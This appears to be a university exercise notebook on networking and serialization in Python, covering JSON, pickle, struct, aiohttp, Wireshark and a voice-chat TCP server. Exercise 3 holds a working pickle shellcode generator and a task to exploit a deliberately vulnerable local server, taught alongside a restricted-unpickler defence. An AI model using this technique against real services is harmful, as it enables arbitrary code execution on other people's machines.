# $\mu$-Exercises

## 0) Refresher (lab automation)
Describe in your own words the principles of communicating with a laboratory instrument. In particular, mention the mainstream interfaces, the way you can communicate with them using Python, the role of `sockets`, the language used to communicate with instruments, and the most important syntax rules.

Write your answer here (double-click to edit): ...

## 1) Serialization with JSON
Deserialize the `json_string` string using the `json` module.

In [None]:
json_string = '[1, 2, 3]'

# STUDENT TASK: Use the `json` module to turn the `json_string` string into a list.
# Hint: Don't forget the import.
...
l = ...

# Check if the outcome is right.
assert l == [1, 2, 3]
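
For reference, `json.dumps` performs the opposite conversion. The small round trip below uses made-up values and shows that JSON only knows a few types: a Python tuple is written as a JSON array and comes back as a list, while `True` and `None` become `true` and `null`.

```python
import json

original = {"name": "probe", "channels": (1, 2), "active": True, "offset": None}

# Serialize to a JSON string; the tuple is written as a JSON array.
text = json.dumps(original, sort_keys=True)
print(text)

# Deserialize again; JSON arrays always become Python lists.
restored = json.loads(text)
print(restored["channels"], restored == original)
```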

## 2) Serialization with `pickle`

In [None]:
import pickle

data = {"aNumber": 1234, "aSet": {1, 2, 3}}

# STUDENT TASK: 
# 1) Try to serialize `data` using `json`. Why does it fail?
# 2) Serialize `data` using `pickle`, store the result in `mu_ex2.dat`.
# 3) Load the data again from the file and deserialize it.

# Hint: use the `pickle.dump` and `pickle.load` functions, which write to
# and read from a file directly.
# `pickle.dump(obj, file)` takes an open file handle as its second argument;
# `pickle.load(file)` takes it as its only argument.
# Use `open("myFilename", "wb")` to open a file for writing in binary mode.
# Use "rb" for opening a file for reading in binary mode.
...

# Check if the deserialized data is correct.
assert data_deserialized == data
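
JSON has no set type. If JSON output is needed anyway, one common workaround (not required for this exercise) is the `default` hook of `json.dumps`, which is called for every object the encoder cannot handle natively. The sketch below, with the hypothetical helper `encode_extra`, turns sets into sorted lists; note that the data then comes back as a list, not as a set.

```python
import json

def encode_extra(obj):
    # Called by json.dumps only for objects it cannot serialize itself.
    if isinstance(obj, (set, frozenset)):
        return sorted(obj)
    raise TypeError(f"Object of type {type(obj).__name__} is not JSON serializable")

example_data = {"aNumber": 1234, "aSet": {3, 1, 2}}
example_text = json.dumps(example_data, default=encode_extra)
print(example_text)

# The set does not survive the round trip: it is now a list.
restored_example = json.loads(example_text)
print(restored_example["aSet"], type(restored_example["aSet"]).__name__)
```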

## 3) HTTP GET - Load search suggestions

Search engines often provide search suggestions while the user is typing.
Startpage.com provides search suggestions in JSON format. For example, the search suggestions for the input `pyth` can be retrieved with the following URL:

https://www.startpage.com/do/suggest?limit=10&lang=english&format=json&query=pyth

Use `aiohttp` to fetch and display search suggestions of a user input.

In [None]:
# Fetch the search suggestions of startpage.com.

import aiohttp
import json

# Ask the user for an input.
print("Enter a query string:")
query = input()

# STUDENT TASK: Create the correct `url` and `params` variables.
url = ...
params = ...

async with aiohttp.ClientSession() as session:
    async with session.get(url, params=params) as resp: # Send a get request
        print("HTTP status:", resp.status)
        
        # Wait for the data to arrive.
        json_text = await resp.text()
        
        # Parse the JSON.
        search_suggestions = json.loads(json_text)
        
        print(f"Search suggestions for {query}:")
        print(search_suggestions[1])
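
The `params` argument of `session.get` accepts a mapping of query parameters, which aiohttp appends to the URL in URL-encoded form. The standard library function `urllib.parse.urlencode` performs the same kind of encoding and is handy for checking what a query string looks like (aiohttp may escape some special characters slightly differently). The endpoint `https://example.com/search` is a placeholder, not a real API.

```python
from urllib.parse import urlencode

base_url = "https://example.com/search"  # placeholder endpoint
example_params = {"q": "pyth on", "limit": 5, "lang": "english"}

# Keys and values are percent-encoded; spaces become '+'.
query_string = urlencode(example_params)
print(f"{base_url}?{query_string}")
```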
        

## 4) Simple HTTP web server
Create an HTTP web server that displays the current time.

In [None]:

from aiohttp import web
import time

# Hint: use time.asctime()
# Copy and simplify the HTTP server code of the lecture here!

...
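
To see what an HTTP response looks like on the wire, here is a sketch that deliberately uses plain `asyncio` streams instead of `aiohttp`; it is not the lecture's server code. The names `build_response`, `handle_client` and `serve_time` as well as the port 8080 are illustrative choices.

```python
import asyncio
import time

def build_response(body: str) -> bytes:
    """Build a minimal HTTP/1.1 response with a plain-text body."""
    payload = body.encode("utf-8")
    header = (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/plain; charset=utf-8\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "Connection: close\r\n"
        "\r\n"  # An empty line separates the header from the body.
    )
    return header.encode("ascii") + payload

async def handle_client(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
    # Consume the request line and headers up to the empty line; their content is ignored.
    while True:
        line = await reader.readline()
        if line in (b"\r\n", b"\n", b""):
            break
    writer.write(build_response(time.asctime() + "\n"))
    await writer.drain()
    writer.close()
    await writer.wait_closed()

async def serve_time(host: str = "127.0.0.1", port: int = 8080) -> None:
    server = await asyncio.start_server(handle_client, host, port)
    async with server:
        await server.serve_forever()
```

In a notebook, start it with `await serve_time()`; in a script, use `asyncio.run(serve_time())`. Then open http://127.0.0.1:8080 in a browser. With aiohttp, the header lines are generated for you.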

# Exercise 1 - Serialize data with `struct`

`struct` converts between Python values and C-like structs, which are represented as byte strings. This also makes it possible to serialize basic types compactly. `struct` provides the two functions `pack()` and `unpack()` for serialization and deserialization. The layout of the data is specified with *format strings*.

For more information see https://docs.python.org/3/library/struct.html, especially the table of format characters: https://docs.python.org/3/library/struct.html#format-characters.

For example, the following code serializes one number as a 32-bit float and another as an 8-bit *unsigned* integer:

In [None]:
import struct

fmt = "fB" # 'f' stands for 32-bit float, 'B' stands for unsigned char/byte.
serialized = struct.pack(fmt, 1.23, 42)
print("serialized =", serialized)

# 32 bits + 8 bits should be exactly 5 bytes.
assert len(serialized) == 5

the_float, the_int = struct.unpack(fmt, serialized)
print("deserialized result:", the_float, the_int) # Notice the small error in the float value: 1.23 is rounded to the nearest 32-bit float.
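
Without a prefix (equivalent to `@`), `struct` uses the machine's native sizes and alignment, so padding bytes can appear between fields. The example above has no padding because the 1-byte `B` comes last. Swapping the order typically inserts 3 padding bytes before the float. A prefix such as `=`, `<`, `>` or `!` selects standard sizes without alignment padding, as this sketch shows.

```python
import struct

# Native mode: the float is aligned to a 4-byte boundary.
print("native 'fB':", struct.calcsize("fB"))
print("native 'Bf':", struct.calcsize("Bf"))  # typically 8 on common platforms

# Standard sizes, no alignment: always 1 + 4 = 5 bytes.
print("standard '=Bf':", struct.calcsize("=Bf"))

packed = struct.pack("=Bf", 42, 1.23)
print(len(packed), packed)
```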

In [None]:
# STUDENT TASK: 'pack' the number '1' into bytes
# once as a 32-bit integer with little-endian byte order
# and once with big-endian byte order.
# Print the results and notice the difference.

...
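
The first character of a format string selects the byte order: `<` for little-endian, `>` for big-endian and `!` for network byte order, which is big-endian. The sketch below uses the arbitrary 16-bit value `0x0102`, whose two bytes are easy to tell apart; `int.to_bytes` produces the same byte sequences.

```python
import struct

value = 0x0102  # the two bytes are 0x01 and 0x02

little = struct.pack("<H", value)   # least significant byte first
big = struct.pack(">H", value)      # most significant byte first
network = struct.pack("!H", value)  # network byte order == big-endian
print(little, big, network)

# int.to_bytes gives the same results.
assert little == value.to_bytes(2, "little")
assert big == network == value.to_bytes(2, "big")

# Unpacking with the wrong byte order silently yields a different number.
print(struct.unpack(">H", little)[0])  # 0x0201 == 513
```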

# Exercise 2 - Inspecting network traffic with Wireshark

This task is recommended but *optional*. The purpose is to briefly introduce the *Wireshark* program.

Network traffic on your computer can be captured for inspection, which is a useful debugging technique when something goes wrong. A well-known program for this purpose is *Wireshark* (https://www.wireshark.org/).
Wireshark records network packets and displays them in a list. It also lets you filter and search for specific packets and inspect their content.

Install Wireshark on your computer. Linux users can usually install Wireshark from the package manager; the package is often called 'wireshark-gtk' or 'wireshark-qt'. Windows and macOS users can find installable packages on the official website.

Run Wireshark. It might require admin/root privileges.

Wireshark allows you to select the network interface. On your laptop there might be several (Wi-Fi, Ethernet, VPN). If you are not sure which one to choose, select 'any' (available on Linux) to see all traffic. Click on 'start' after selecting the network interface.

Soon there should be network packets on the display. Let's filter the packets such that we only see IP packets from or to `httpbin.org`.

In the *Filter* input enter: `ip.host==httpbin.org`

Now the list of packets should be empty.

To get some data, execute the following *unencrypted* query (HTTP, not HTTPS) to 'httpbin.org':

In [None]:
import aiohttp

url = "http://httpbin.org/get"

async with aiohttp.ClientSession() as session:
    async with session.get(url) as resp:
        print("HTTP status:", resp.status)
        print("Response:", await resp.text())

Try to make sense of what you see.

A useful way to inspect a TCP stream is: *right-click on a packet* -> *Follow TCP Stream*.

# Exercise 3 - Remote code execution with Pickle

As mentioned in the lecture, `pickle` is dangerous to use on untrusted data. This exercise illustrates how `pickle.loads` can be forced to execute arbitrary code.

This exercise can be completed without understanding the pickle language; therefore, the following subsection is optional.

This exercise is largely inspired by https://checkoway.net/musings/pickle/, though adapted for Python 3.

## Understanding the pickle format (optional)

Pickled data is actually a program for a *stack machine* (https://en.wikipedia.org/wiki/Stack_machine). The `pickle.loads()` function executes this program. The few pickle commands used in this exercise are outlined below.

(This has been copied from https://checkoway.net/musings/pickle/)

* `c`: Read to the newline as the module name, `module`. Read the next line as the object name, `object`. Push `module.object` onto the stack.
* `(`: Insert a marker object onto the stack. This can be used to select a section of the stack for further operations.
* `t`: Pop objects off the stack (in last-in-first-out order) until a `(` marker is popped, and create a tuple containing the popped objects (excluding the `(`) in the order they were pushed onto the stack. Push the tuple onto the stack.
* `S`: Read the string in quotes up to the newline and push it onto the stack.
* `R`: Pop a tuple and a callable off the stack and call the callable with the tuple as arguments. Push the result onto the stack.
* `.`: End of the pickle.

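The following code shows a byte string that forces `pickle.loads()` to execute the function `__builtin__.print` with the argument `"Hello!"`. (`__builtin__` is the Python 2 module name; for old-style pickles like this one, the Python 3 unpickler maps it to `builtins`.)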

In [None]:
import pickle

# 'shellcode' is traditionally a piece of data that can be used
# to exploit a vulnerability in a program and give access to the *shell*
# on the victim computer.
# Here we only let the victim print "Hello!" for simplicity.

shellcode = b"""c__builtin__
print
(S'Hello!'
tR."""

# This shellcode does the following.
# At the beginning the stack is empty:
#  Stack = []
# 1. `c`: push `__builtin__.print` onto the stack.
#  Stack = [__builtin__.print]
# 2. `(`: push a marker, then `S`: push `"Hello!"`.
#  Stack = [__builtin__.print, MARK, "Hello!"]
# 3. `t`: pop up to the marker and push the tuple `("Hello!", )`.
#  Stack = [__builtin__.print, ("Hello!", )]
# 4. `R`: call `__builtin__.print` with the content of the tuple as arguments
#    and push the return value (`None`).
#  Stack = [None]
# 5. `.`: stop; `pickle.loads` returns the top of the stack (`None`).

pickle.loads(shellcode)
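
The standard library module `pickletools` can decode a pickle program without executing it, which is a safe way to look at suspicious data. This sketch lists the opcodes of the shellcode above; the bytes are repeated so the cell is self-contained.

```python
import pickletools

shellcode = b"""c__builtin__
print
(S'Hello!'
tR."""

# genops() only parses the byte string; nothing is imported or called.
for opcode, arg, pos in pickletools.genops(shellcode):
    print(f"{pos:3d}  {opcode.code!r:6} {opcode.name:8} {arg!r}")

opnames = [opcode.name for opcode, _, _ in pickletools.genops(shellcode)]
print(opnames)
```

The opcode names (`GLOBAL`, `MARK`, `STRING`, `TUPLE`, `REDUCE`, `STOP`) correspond one to one to the commands `c`, `(`, `S`, `t`, `R` and `.` listed above.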

## Creating shellcode

Understanding the details of this section is optional. Only the function `create_shellcode()` will be used for the task.

*Shellcode* is traditionally a piece of data that can be used to exploit a vulnerability in a program and give access to the *shell* (like `bash` or `sh` in the terminal) on the victim computer.

Since Python can execute shell commands (e.g. with `os.system()`), being able to run arbitrary Python code is equivalent to unrestricted access to the terminal.

The following code converts a function `payload` into *shellcode*, i.e. a byte string that will execute the `payload` function when it is processed by `pickle.loads`.

First we need a way to serialize and deserialize functions. `pickle` serializes functions only by reference (module and name), not their code; therefore the serialization module `marshal` is used to serialize the function's code object, as shown in the following code.

In [None]:
import types
import marshal

def payload():
    """
    This function shall be serialized.
    """
    print("Hello, I am the payload function!")
    
# Serialize the code of the payload function.
code_enc = marshal.dumps(payload.__code__)

# Deserialize the payload function.
deserialized_function = (types.FunctionType(marshal.loads(code_enc), globals(), ''))
# Execute the deserialized function.
deserialized_function()

In [None]:
# Create shellcode that will execute the `payload` function in the exploited program.
# Understanding the shellcode is optional.
# This was inspired by: https://checkoway.net/musings/pickle/

import marshal
import base64

def payload():
    """
    This is the code that will be executed during deserialization with pickle.
    """
    print("You have been hacked!")

def create_shellcode(payload_function) -> bytes:
    # Serialize the code of the given payload function.
    byte_code = marshal.dumps(payload_function.__code__)

    # Encode the byte code as Base64.
    # Base64 allows to represent arbitrary bytes as printable ASCII characters.
    byte_code_base64 = base64.b64encode(byte_code)

    shellcode = b"""ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR.""" % byte_code_base64
    
    return shellcode

shellcode = create_shellcode(payload)

print(shellcode)


In [None]:
# Feed the shellcode to the vulnerable function.
# This will execute the payload function.
# Notice that the shellcode is just a byte string,
# therefore it can be sent over the network or be used to contaminate a file.
pickle.loads(shellcode)

## Student task
The file `01_vulnerable_tcp_server.py` contains code for a server that reads a serialized object from the network and deserializes it. Study and run the server script. Then write code that sends a dict serialized with `pickle.dumps()`. Finally, modify your code to hack the server.

In [None]:

# STUDENT TASK
# Connect to the TCP server on localhost:12345 and send it a serialized dict (with `pickle`).
# Hint: Consult the async client script in the folder of Lecture 10.
# Use `pickle.dumps()` to serialize the dict.

...

In [None]:
# STUDENT TASK: Modify your solution from above to send malicious shellcode instead of an
# encoded dict.
# Hint: Use `create_shellcode` to convert a function into shellcode bytes.

...
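
On the defensive side, the Python documentation describes restricting which globals an unpickler may load by overriding `Unpickler.find_class`. The sketch below rejects every global lookup except a small allow-list (`SAFE_GLOBALS` and `restricted_loads` are illustrative names), so both the `print` shellcode and the output of `create_shellcode()` fail with `UnpicklingError` before any code runs. This narrows the attack surface but is no guarantee; the documentation still advises never to unpickle untrusted data, and formats like JSON avoid the problem altogether.

```python
import io
import pickle

# Illustrative allow-list of (module, name) pairs that may be loaded.
SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global reference in the pickle (e.g. the `c` opcode).
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data: bytes):
    """Replacement for pickle.loads() that only resolves allow-listed globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

# A plain dict round-trips normally.
print(restricted_loads(pickle.dumps({"aNumber": 1234, "aSet": {1, 2, 3}})))

# The "Hello!" shellcode is rejected before print() is ever called.
try:
    restricted_loads(b"c__builtin__\nprint\n(S'Hello!'\ntR.")
except pickle.UnpicklingError as err:
    print("Blocked:", err)
```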

# Exercise 4 - Voice over TCP/IP

The goal of this exercise is to create a client and a server script for voice calls over the internet. A minimal example is already available in the files `04_01_audio_client.py` and `04_01_audio_echo_server.py`. The client script connects to a TCP server. Once the connection is open, the client reads audio data from the microphone and sends it to the server. The server simply sends the audio back to the client. The client interprets all incoming data as an audio signal and forwards it to the speaker.

The client code uses the Python package `pyaudio` for recording and playing sound. Make sure it is installed.

## Task 4.1
Study the two scripts and run them. The goal is to hear your own echo.
The following tasks build on these scripts.

## Task 4.2
Instead of sending the audio signal back to where it came from, it should now be sent to all other open connections so that all connected users can hear each other. The client script `04_01_audio_client.py` does not need to be changed; all modifications should happen in the file `04_02_audio_server.py`, which already contains a few hints. Student tasks are all marked with `STUDENT TASK`.

It might be helpful to revisit the chat server exercise of Lecture 10 (Exercise 1).

The chat server from Lecture 10 simply forwarded messages to all other connected clients. The voice call server works differently: instead of forwarding independent audio signals, it should mix all individual signals together. More precisely, the server should send back the *sum* of all signals. This reduces bandwidth usage and also makes it possible to reuse the same client script.
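
The core of the mixing step can be sketched in a few lines. This assumes the frames are signed 16-bit PCM samples in native byte order (check the `pyaudio` format used in the client script) and that all frames have the same length; `mix_frames` is a hypothetical helper, not part of the provided files. A sum of several signals can exceed the 16-bit range, so the result is clipped.

```python
from array import array

INT16_MIN, INT16_MAX = -32768, 32767

def mix_frames(frames: list[bytes]) -> bytes:
    """Sum equally long frames of signed 16-bit PCM samples, clipping to the int16 range."""
    if not frames:
        return b""
    # array("h", ...) interprets the bytes as native-endian signed shorts.
    signals = [array("h", frame) for frame in frames]
    n = len(signals[0])
    if any(len(s) != n for s in signals):
        raise ValueError("all frames must contain the same number of samples")
    mixed = array("h", [0]) * n
    for i in range(n):
        total = sum(s[i] for s in signals)
        mixed[i] = max(INT16_MIN, min(INT16_MAX, total))
    return mixed.tobytes()

# Two short, made-up frames of three samples each.
a = array("h", [1000, -1000, 30000]).tobytes()
b = array("h", [2000, -2000, 10000]).tobytes()
print(list(array("h", mix_frames([a, b]))))  # [3000, -3000, 32767]
```

Clipping keeps the output valid but distorts loud passages; scaling the sum down is an alternative at the cost of lower volume.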

## Task 4.2.1 (optional)
Use the scripts to have a chat with your colleagues. For this, the server must be accessible to all parties. One possibility is to run the server script on one of the Tardis computers. The clients must run on the *local* computers in order to access the microphone and speaker. Because the Tardis computers are not accessible from the public internet, use an *SSH tunnel* to forward the connection from your computer to the server on the Tardis machine.

Make sure you are connected to the ETHZ VPN.
```sh
ssh NETHZUSERNAME@tardis-c07.ee.ethz.ch

# Load anaconda.
source /usr/pack/anaconda-3-fg/anaconda3_env.sh

# Upload the server script somehow, for example by
# copy-pasting it into the `nano` text editor.

# Run the server script.
python3 serverscript.py --port 1234
```

Or alternatively:
```sh
# This is a hack to upload and execute the script on a tardis machine in one line.
cat 04_02_audio_server.py | ssh NETHZUSERNAME@tardis-c07.ee.ethz.ch "cat > /tmp/server.py && source /usr/pack/anaconda-3-fg/anaconda3_env.sh && python3 /tmp/server.py --port 1234; rm /tmp/server.py"
```

Create an SSH tunnel from another terminal:
```sh
ssh -L localhost:1234:tardis-c07:1234 NETHZUSERNAME@tardis-c07.ee.ethz.ch
```

Now you can connect to the server on the Tardis as if it were running locally.
```sh
python3 clientscript.py --server localhost --port 1234
```

You can now either launch two instances of the client script or try to connect to the same server with other colleagues.

### Renting a cheap server
A more professional solution for running the voice call server is to use a computer that is accessible from the internet or to rent a virtual private server (VPS). There are many hosting providers; for example, a cheap and easy solution can be found at https://www.scaleway.com (requires a credit card; prepaid credit cards also work).

## Task 4.3 (optional)
Extend the server and the client code to support *rooms*. Users should only hear other users in the same room, not everybody else.
Proceed as follows:
* Create copies of the client and server code you used in the previous task. If you could not complete the previous task or need more hints, use the files `04_03_audio_client.py` and `04_03_audio_server.py` instead.
* The client should transmit the room name as a line terminated by `\n` at the very beginning of the connection. This implies that the server must also read a full line before reading audio frames.
* On the server create a dict that holds `AudioMixer` objects for each of the room names. When a client connects to the server the right audio mixer should be chosen based on the room name.
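
The room handshake on the server side can be sketched with `asyncio` streams as below. `Room`, `get_room` and `read_room_name` are hypothetical names; in the real server, the dict values would be the `AudioMixer` objects from the provided files. The 64-character limit is an arbitrary sanity check.

```python
import asyncio

class Room:
    """Hypothetical stand-in for the per-room AudioMixer."""
    def __init__(self, name: str) -> None:
        self.name = name

rooms: dict[str, Room] = {}

def get_room(name: str) -> Room:
    # Create the room on first use and reuse it for later clients.
    if name not in rooms:
        rooms[name] = Room(name)
    return rooms[name]

async def read_room_name(reader: asyncio.StreamReader, max_len: int = 64) -> str:
    """Read the first line of a connection and return it as the room name."""
    line = await reader.readline()
    if not line.endswith(b"\n"):
        raise ConnectionError("connection closed before the room name was received")
    name = line.decode("utf-8").strip()
    if not name or len(name) > max_len:
        raise ValueError(f"invalid room name: {name!r}")
    return name

async def handle_client(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
    room = get_room(await read_room_name(reader))
    print(f"client joined room {room.name!r}")
    # From here on, read audio frames and feed them to the mixer of `room`.
```

On the client side, the matching step would be to write `room_name.encode("utf-8") + b"\n"` to the stream before sending the first audio frame.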